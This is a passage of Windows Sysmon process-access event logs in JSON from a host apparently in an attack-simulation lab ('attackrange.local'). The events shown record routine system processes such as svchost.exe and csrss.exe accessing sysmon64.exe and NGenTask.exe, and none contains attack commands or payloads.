{E2A3D6B1-12B4-5F25-0000-0010BF860900}\r\nTargetProcessId: 1172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.991","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-0010BF860900}","TargetProcessId":"1172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6846,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.991\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.991","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6847,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.991\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.991","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6848,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.991\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.991","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6849,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.991\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.991","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6850,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.991\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.991","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6851,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.991\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.991","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6852,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.991\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.991","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6853,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.991\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 